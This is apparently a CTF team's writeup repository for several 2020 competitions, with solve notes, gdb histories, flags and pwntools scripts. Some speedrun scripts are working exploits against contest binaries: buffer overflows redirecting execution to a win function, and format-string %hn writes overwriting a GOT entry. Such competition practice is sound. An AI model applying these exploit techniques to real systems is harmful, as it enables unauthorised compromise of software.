/2020/affinity_ctf_lite/collision_course/collision2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/collision_course/collision2.zip


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/dias skeerG tneicna/decode.me:
--------------------------------------------------------------------------------
1 | 554545532245{22434223_4223_42212322_55_234234313551_34553131423344}
2 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/flag.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/ostrichflag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/ostrichflag.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/pubkey.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/pubkey.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/sherlock.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/sherlock.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/wayback.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/wayback.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/wp1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/wp1.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/pseudo-pseudo-random/README.md:
--------------------------------------------------------------------------------
1 | # Writeup : pseudo-pseudo-random
2 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/rank.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/sooodefault/README.md:
--------------------------------------------------------------------------------
 1 | # sooodefault
 2 | 
 3 | **Category**: Web \
 4 | **Points**: 30
 5 | 
 6 | Opening the given link: `http://web2.affinityctf.com/` gives us a Apache2 Ubuntu
 7 | Default Page.
 8 | If we compare the page with any Apache2 Default page, will notice there HTML
 9 | entites. Decoding this will give us the flag but I wrote a quick script for
10 | to collect and decode it :D
11 | ```python
12 | import requests
13 | import re
14 | r=requests.session()
15 | url="http://web2.affinityctf.com/"
16 | op=r.get(url)
17 | op=re.findall("&#[0-9]{2,3}",op.text)
18 | print(op)
19 | print(''.join([chr(int(i.replace("&#",""))) for i in op]))
20 | ```
21 | ![script](script.png)
22 | 
23 | The flag is `AFFCTF{htmlentity}`
24 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/sooodefault/script.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/sooodefault/script.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/true-content/images/before-redirect.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/true-content/images/before-redirect.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/true-content/images/construction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/true-content/images/construction.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/true-content/images/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/true-content/images/solve.png


--------------------------------------------------------------------------------
/2020/asis_ctf/README.md:
--------------------------------------------------------------------------------
 1 | # Asis CTF 2020
 2 | 
 3 | **Site** : https://asisctf.com
 4 | 
 5 | **Rank** : 64/351
 6 | 
 7 | ![](asis.png)
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | 


--------------------------------------------------------------------------------
/2020/asis_ctf/asis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/asis_ctf/asis.png


--------------------------------------------------------------------------------
/2020/dragon_ctf/README.md:
--------------------------------------------------------------------------------
1 | # Dragon CTF 2020
2 | 
3 | **Rank**: 107 / 539
4 | 
5 | ## Solves
6 | - [Bit Flip 1](https://github.com/qxxxb/ctf/tree/master/2020/dragon_ctf/bit_flip/1)
7 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/README.md:
--------------------------------------------------------------------------------
1 | # SunshineCTF 2020
2 | 
3 | **Site**: https://sunshinectf.org/
4 | 
5 | **Rank**: 17 / 742
6 | 
7 | ![rank](rank.png)
8 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/.gdb_history:
--------------------------------------------------------------------------------
 1 | checksec
 2 | start
 3 | ni
 4 | q
 5 | start
 6 | ni
 7 | ni
 8 | ni
 9 | ni
10 | nearpc
11 | nearpc 50
12 | search flag
13 | search sun
14 | search time
15 | search sink
16 | ls
17 | ctx
18 | si
19 | ni
20 | ni
21 | disassemble check_flag
22 | q
23 | start
24 | ni
25 | p f
26 | p &f
27 | hexdump f
28 | q
29 | main
30 | start
31 | nextcall
32 | si
33 | ni
34 | ni
35 | ni
36 | x al
37 | x $al
38 | p $al
39 | ? 0x36
40 | ni
41 | ni
42 | ni
43 | ni
44 | ni
45 | q
46 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/hotel/a.out


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/hotel_key_puzzle:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/hotel/hotel_key_puzzle


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/key.txt:
--------------------------------------------------------------------------------
1 | sun{b3llh0p5-runn1n6-qu1ckly}


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/main.py:
--------------------------------------------------------------------------------
 1 | def inc(c, d):
 2 |     return chr(ord(c) + d)
 3 | 
 4 | def dec(c, d):
 5 |     return chr(ord(c) - d)
 6 | 
 7 | arg1 = ["+"] * 29
 8 | 
 9 | arg1[0x13] = '6'
10 | arg1[0x10] = 'n'
11 | arg1[0xd] = 'r'
12 | arg1[0x14] = dec('%', -8)
13 | arg1[0xf] = 'n'
14 | arg1[10] = 'p'
15 | arg1[0x10] = dec('u', 7)
16 | arg1[3] = '{'
17 | arg1[0x13] = '6'
18 | arg1[0x15] = 'q'
19 | arg1[2] = 'n'
20 | arg1[0] = 's'
21 | arg1[7] = 'l'
22 | arg1[0xe] = 'u'
23 | arg1[0xc] = dec(',', -1)
24 | arg1[4] = 'b'
25 | arg1[6] = dec('o', 3)
26 | arg1[0x12] = 'n'
27 | arg1[0x16] = dec('z', 5)
28 | arg1[0x17] = '1'
29 | arg1[1] = 'u'
30 | arg1[5] = dec('8', 5)
31 | arg1[8] = dec('f', 3 + 4 - 9)
32 | arg1[0xb] = dec('<', 7)
33 | arg1[0x11] = dec('-', 6 - 8 + ord('\t') - 5 - 6)
34 | arg1[9] = dec(',', 1 + 2 - 7)
35 | arg1[0x18] = dec('Y', -10 - 8 + ord('\b'))
36 | arg1[0x19] = dec('w', 5 + ord('\a'))
37 | arg1[0x1a] = dec('m', -6 + ord('\a'))
38 | arg1[0x1b] = 'y'
39 | arg1[0x1c] = '}'
40 | 
41 | for i, c in enumerate(arg1):
42 |     print(i, c)
43 | 
44 | print()
45 | 
46 | key = "".join(arg1)
47 | print(key)
48 | 
49 | with open('key.txt', 'w') as f:
50 |     f.write(key)
51 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/notes.md:
--------------------------------------------------------------------------------
1 | length: 0x1d = 29
2 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/test.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | int main(int argc, char *argv[])
 4 | {
 5 |     char x = 'a';
 6 |     char f = '\a';
 7 |     x = x + f;
 8 |     printf("%c\n", x);
 9 |     return 0;
10 | }
11 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/LicenseChecker.peg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/LicenseChecker.peg


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/PEGASUS_User_Guide.peg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/PEGASUS_User_Guide.peg


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/bof.peg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/bof.peg


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/core.sh.25065:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/core.sh.25065


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/dump:
--------------------------------------------------------------------------------
1 | fac4: 0000 0000 0000 0000 ebc1 ebc1 ebc1 ebc1  ................
2 | fad4: ebc1 ebc1 ebc1 ebc1 ebc1 ebc1 eb00 8080  ................
3 | fae4: 8080 8080 8080 8080 8080 8080 8080 8080  ................
4 | faf4: 8080 80c0 f0e5 e7ae e5e1 7200            ..........r.
5 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/dump1:
--------------------------------------------------------------------------------
1 | fac4: 672e 6561 f2c0 f0e5 ebc1 ebc1 ebc1 ebc1  g.ea............
2 | fad4: ebc1 ebc1 ebc1 ebc1 ebc1 ebc1 eb00 8080  ................
3 | fae4: 8080 8080 8080 8080 8080 8080 8080 8080  ................
4 | faf4: 8080 80c0 f0e5 e7ae e5e1 7200            ..........r.
5 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/flag.txt:
--------------------------------------------------------------------------------
1 | sun{fart}
2 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/libpegasus_ear.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/libpegasus_ear.so


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_brute_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_brute_checker.so


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_dev_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_dev_checker.so


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_pwn_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_pwn_checker.so


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_rev_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_rev_checker.so


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/runpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/runpeg


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/scramble.py:
--------------------------------------------------------------------------------
 1 | stack = [b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\x00', b'\x00', b'\x00', b'\x00', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\x72', b'\x00']
 2 | print(stack)
 3 | 
 4 | rv = 30  # &email[0]
 5 | r3 = 0  # &license[0]
 6 | 
 7 | r4 = rv
 8 | r5 = rv
 9 | 
10 | # ...
11 | 
12 | r6 = 58
13 | 
14 | r5 = r4
15 | r7 = 0
16 | while True:
17 |     rv = r3 + 0x7 + r7
18 |     r4 = stack[r5]
19 |     tmp = stack[rv]
20 |     tmp = bytes([tmp[0] & r4[0]])
21 |     stack[rv] = tmp
22 |     r5 += 1
23 |     r7 += 1
24 |     if r5 <= r6:
25 |         break
26 | 
27 | rv = 0
28 | r7 = 0
29 | 
30 | print(stack)
31 | 
32 | while True:
33 |     r5 = r3 + r7
34 |     r5 = stack[r5]
35 |     # print(stack[r5])
36 |     print(rv)
37 |     r7 += 1
38 |     if r7 >= 0x7:
39 |         break
40 | 
41 | print(rv)
42 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/scratch.md:
--------------------------------------------------------------------------------
 1 | b 0x294
 2 | aaaabaaacaaadaaaeaaafaaagaaahaAAAABAAACAAADAAAEAAAFAAAGAAAHA
 3 | zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁ
 4 | zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzkAkAkAkAkAkAkAkAkAkAkAkAkAkAkA
 5 | 
 6 | Finally the license key works!
 7 | rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrkAkAkAkAkAkAkAkAkAkAkAkAkAkAkA
 8 | 
 9 | rrrrrrrrrrrrrrrrrrrrrrrrrrrrr
10 | pancakes_dont_taste_bad_maybe
11 | rrrrrrrrrrrrrrrrrrrrrrrrrråár
12 | kAkAkAkAkAkAkAkAkAkAkAkAkAkAkA
13 | 
14 | hexdump r 0xfae2 30
15 | 
16 | ord('A') - 0xC1 = -128
17 | ord('1') - 0xB1 = -128
18 | ord('1') + 128 = 0xb1
19 | 
20 | We need
21 | ord(x) + 128 > 235
22 | ord(x) > 235 - 128
23 | x > chr(235 - 128)
24 | 
25 | AAAABAAACAAADAAAEAAAFAAAGAAAHA
26 | 
27 | cm = c | 0x80
28 | r6 = cm & 0x7f
29 | r6 = r6 - 0x41
30 | 
31 | - How did the null byte get set in recv_str?
32 | 	- Answer: It is initialized with null bytes
33 | - Can we abuse BRA, RD, DC, RV to return where we want?
34 | 	- Write 0x80 in the email
35 | 
36 | - recv_str has an error with newline: 1 byte can bypass the 0x80 OR
37 | - But using this makes the length 29 instead of 30
38 | - What about the OR stuff from check_license_key?
39 | 
40 | 0xfae2 + 30 == 0xfb00
41 | 
42 | 0000-0100: R=00 W=00 X=00 fault=0000
43 | 0100-0300: R=12 W=00 X=12 fault=0000
44 | 0300-EA00: R=00 W=00 X=00 fault=0000
45 | EA00-EB00: R=00 W=00 X=00 fault=F000
46 | EB00-FB00: R=02 W=02 X=00 fault=0000
47 | FB00-FC00: R=00 W=00 X=00 fault=FB00
48 | FC00-FFFF: R=FC W=FC X=00 fault=0000
49 | 
50 | 0xfb00 is right at the start of a new page
51 | Also, why is FB00 set as the fault handler?
52 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/submitpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/submitpeg


--------------------------------------------------------------------------------
/2020/sunshine_ctf/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/rank.png


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | main
 3 | ni
 4 | cyclic 256
 5 | ni
 6 | telescope $rbp-4
 7 | ctx
 8 | x $rbp-4
 9 | nearpc
10 | ls
11 | q
12 | b main
13 | run
14 | q
15 | b main
16 | run < payload
17 | ni
18 | p rbp
19 | p $rbp
20 | c
21 | run
22 | ni
23 | cyclic 256
24 | ni
25 | q
26 | start
27 | main
28 | ni
29 | p $rbp-4
30 | x $rbp-4
31 | cyclic -l 0x61616170
32 | q
33 | disassemble main
34 | q
35 | ctx
36 | start
37 | main
38 | ctx
39 | ni
40 | ni
41 | ni
42 | ni
43 | ni
44 | ni
45 | disasm main
46 | diassemble main
47 | disassemble main
48 | q
49 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/chall_00:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/0/chall_00


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/main.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | 
 3 | pwn.context.arch = 'amd64'
 4 | sh = pwn.remote('chal.2020.sunshinectf.org', 30000)
 5 | payload = pwn.cyclic(60) + pwn.p64(0xfacade)
 6 | 
 7 | with open('payload', 'wb') as f:
 8 |     f.write(payload)
 9 | 
10 | sh.sendline(payload)
11 | sh.interactive()
12 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/0/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | checksec
 3 | ni
 4 | main
 5 | ni
 6 | ni
 7 | ni
 8 | ni
 9 | ni
10 | checksec
11 | zsh cyclic 256 | xsel -bi
12 | zsh
13 | start
14 | main
15 | ni
16 | ni
17 | ni
18 | ni
19 | nearpc 10
20 | nearpc 12
21 | nearpc 15
22 | ctx
23 | ni
24 | p $rbp-4
25 | p 4rbp-8
26 | p $rbp-8
27 | distance $rsp $rbp-8
28 | distance $rsp $rbp-4
29 | x $rbp-4
30 | x $rbp-8
31 | c
32 | c
33 | start
34 | main
35 | nextcall
36 | ni
37 | aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaab
38 | q
39 | start
40 | main
41 | ni
42 | ni
43 | ni
44 | x $rbp-4
45 | cyclic 0x61616178
46 | cyclic -l 0x61616178
47 | x $rbp-8
48 | cyclic -l 0x61616177
49 | q
50 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/chall_01:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/1/chall_01


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/main.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | 
 3 | pwn.context.arch = 'amd64'
 4 | sh = pwn.remote('chal.2020.sunshinectf.org', 30001)
 5 | # sh = pwn.process('./chall_01')
 6 | p1 = "A" * 13
 7 | payload = pwn.cyclic(88) + pwn.p32(0xfacade) + pwn.p32(0xfacade)
 8 | 
 9 | # with open('payload', 'wb') as f:
10 | #     f.write(payload)
11 | 
12 | sh.sendline(p1)
13 | sh.sendline(payload)
14 | sh.interactive()
15 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/1/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/.gdb_history:
--------------------------------------------------------------------------------
  1 | pwndbg func
  2 | pwndbg sym
  3 | start
  4 | main
  5 | ni
  6 | disassemble main
  7 | ni
  8 | ni
  9 | ni
 10 | ni
 11 | cyclic 19
 12 | ni
 13 | ni
 14 | si
 15 | ni
 16 | checksec
 17 | ni
 18 | ni
 19 | ni
 20 | ni
 21 | ni
 22 | ni
 23 | ni
 24 | ni
 25 | ni
 26 | c
 27 | q
 28 | start
 29 | main
 30 | ni
 31 | ni
 32 | ni
 33 | si
 34 | ni
 35 | ni
 36 | ni
 37 | ni
 38 | ni
 39 | p win
 40 | c
 41 | b main
 42 | q
 43 | b vuln
 44 | run < payload
 45 | nextcall
 46 | ni
 47 | ni
 48 | si
 49 | ni
 50 | telescope $ebp+8
 51 | p $ebp+8
 52 | x $ebp+8
 53 | search aaa
 54 | ctx
 55 | distance 0xffffc5fe $ebp+8
 56 | q
 57 | b main 
 58 | q
 59 | b vuln
 60 | run < payload
 61 | ni
 62 | ni
 63 | ni
 64 | ni
 65 | ni
 66 | ni
 67 | p $ebp+8
 68 | hex $esp
 69 | cyclic -l aapa
 70 | p $ebp+8
 71 | telescope $ebp+8
 72 | ctx
 73 | hex
 74 | q
 75 | b vuln
 76 | run < payload
 77 | ni
 78 | ni
 79 | p $ebp+4
 80 | x $ebp+4
 81 | ds $ebp+4
 82 | cyclic -l aaaa
 83 | q
 84 | b vuln
 85 | run < payload
 86 | nextcall 
 87 | ret
 88 | return
 89 | q
 90 | b vuln
 91 | run < payload
 92 | nextcall
 93 | ni
 94 | q
 95 | b vuln
 96 | run < payload
 97 | ni
 98 | si
 99 | ni
100 | p $ebp+8
101 | x $ebp+8
102 | hex $ebp+8
103 | hex $ebp
104 | q
105 | b vuln
106 | run < payload
107 | nextcall 
108 | ni
109 | q
110 | b vuln
111 | run < payload
112 | nextcall
113 | ni
114 | si
115 | ni
116 | p $ebp+8
117 | x $ebp+8
118 | ni
119 | ni
120 | ni
121 | q
122 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/chall_10:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/10/chall_10


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | sh = remote('chal.2020.sunshinectf.org', 30010)
 4 | # sh = process('./chall_10')
 5 | 
 6 | p1 = "abc"
 7 | 
 8 | ret_padding = cyclic_find(0x61716161)
 9 | win_addr = 0x80484d6
10 | payload = cyclic(ret_padding) + p32(win_addr) + p32(0) + p32(0xdeadbeef)
11 | 
12 | # 0xffffc5fe
13 | 
14 | with open('payload', 'w') as f:
15 |     f.write(p1 + '\n')
16 | 
17 | with open('payload', 'ab') as f:
18 |     f.write(payload)
19 | 
20 | sh.recvline()
21 | sh.sendline(p1)
22 | 
23 | sh.sendline(payload)
24 | sh.interactive()
25 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/notes.md:
--------------------------------------------------------------------------------
1 | fgets:
2 | s = ebp - 0x1c
3 | n = 0x13 (19)
4 | 
5 | ► 0x8048531 <vuln+39>    ret    <0x61716161>
6 | 
7 | $1 = {<text variable, no debug info>} 0x80484d6 <win>
8 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/payload:
--------------------------------------------------------------------------------
1 | abc
2 | aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaքﾭ�


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/chall_11:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/11/chall_11


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/11/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | # sh = remote('chal.2020.sunshinectf.org', 30011)
 4 | sh = process('./chall_11')
 5 | 
 6 | p1 = 'abc'
 7 | 
 8 | win = 0x80484e6
 9 | win1 = win & 0xffff
10 | win2 = (win & 0xffff0000) >> (4 * 4)
11 | 
12 | fflush = 0x8049918
13 | fflush1 = fflush
14 | fflush2 = fflush1 + 2
15 | 
16 | payload = b'AAAA' + p32(fflush2) + p32(fflush1)
17 | n_sent = len(payload)
18 | 
19 | payload += "%{}x".format(win2 - n_sent).encode() + b'%7$hn'
20 | n_sent = win2
21 | 
22 | payload += "%{}x".format(win1 - n_sent).encode() + b'%8$hn'
23 | 
24 | with open('payload', 'w') as f:
25 |     f.write(p1 + '\n')
26 | 
27 | with open('payload', 'ab') as f:
28 |     f.write(payload)
29 | 
30 | sh.recvline()
31 | sh.sendline(p1)
32 | 
33 | sh.sendline(payload)
34 | sh.interactive()
35 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/11/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | main
 3 | disassemble main
 4 | disassemble vuln
 5 | ni
 6 | main
 7 | ni
 8 | p main
 9 | ni
10 | p win
11 | distance win main
12 | distance &win &main
13 | ni
14 | ni
15 | ni
16 | si
17 | ni
18 | ABCD%7$x
19 | ni
20 | ni
21 | ni
22 | ni
23 | ni
24 | c
25 | q
26 | got
27 | start
28 | got
29 | q
30 | start
31 | got
32 | distance 0x565569fc &main
33 | p main
34 | p win
35 | p main
36 | distance &main &win
37 | distaince [0x565569fc] fflush@GLIBC_2.0 -> 0xf7e39350 (fflush) ◂— push   ebp
38 | distance 0x565569fc &main
39 | distance &main 0x565569fc
40 | exit
41 | q
42 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/chall_12:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/12/chall_12


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | sh = remote('chal.2020.sunshinectf.org', 30012)
 4 | # sh = process('./chall_12')
 5 | 
 6 | p1 = 'abc'
 7 | 
 8 | s = sh.recvline().decode('ascii').split()
 9 | main_addr = int(s[-1], 0)
10 | print('main:', hex(main_addr))
11 | win = main_addr - 0x8c
12 | print('win:', hex(win))
13 | 
14 | win1 = win & 0xffff
15 | win2 = (win & 0xffff0000) >> (4 * 4)
16 | 
17 | # [0x565569fc] fflush@GLIBC_2.0 -> 0xf7e39350 (fflush) ◂— push   ebp
18 | fflush = main_addr + 0x13c3
19 | print('fflush:', hex(fflush))
20 | 
21 | fflush1 = fflush
